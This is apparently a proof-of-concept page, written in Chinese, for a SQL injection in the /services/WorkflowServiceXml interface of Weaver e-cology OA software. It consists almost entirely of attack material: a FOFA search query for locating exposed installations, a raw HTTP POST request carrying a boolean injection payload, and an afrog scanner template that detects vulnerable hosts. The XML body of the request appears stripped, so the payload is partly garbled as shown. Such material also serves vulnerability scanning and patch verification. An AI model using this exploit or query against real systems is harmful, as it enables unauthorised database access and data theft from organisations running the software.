# 泛微OA-E-Cology接口WorkflowServiceXml存在SQL注入漏洞
泛微OA E Cology 接口/services/WorkflowServiceXml 存在SQL注入漏洞,可获取数据库权限,导致数据泄露。
## fofa
```yaml
app="泛微-OA(e-cology)"
```
## poc
```yaml
POST /services/WorkflowServiceXml HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Content-Type: text/xml
Accept-Encoding: gzip
Content-Length: 487
1
1
1
1
1=1 AND 5615=5615
```
## afrog poc
```yaml
id: 泛微OA-E-Cology接口WorkflowServiceXml存在SQL注入漏洞
info:
name: 泛微OA-E-Cology接口WorkflowServiceXml存在SQL注入漏洞
author: wy876
severity: high
verified: true
description: |-
泛微OA E Cology 接口/services/WorkflowServiceXml 存在SQL注入漏洞,可获取数据库权限,导致数据泄露。
Fofa: app="泛微-OA(e-cology)"
reference:
- https://github.com/wy876/POC/blob/main/泛微OA-E-Cology接口WorkflowServiceXml存在SQL注入漏洞.md
tags: 泛微e-cology
created: 2024/07/13
rules:
r0:
request:
method: POST
path: /services/WorkflowServiceXml
headers:
Content-Type: text/xml
body: |
1
1
1
1
1=1 AND 5615=5615
expression: response.status == 200 && response.body.bcontains(b'WorkflowRequestInfo') && response.body.bcontains(b'workflowName') && response.body.bcontains(b'lastOperatorName')
expression: r0()
```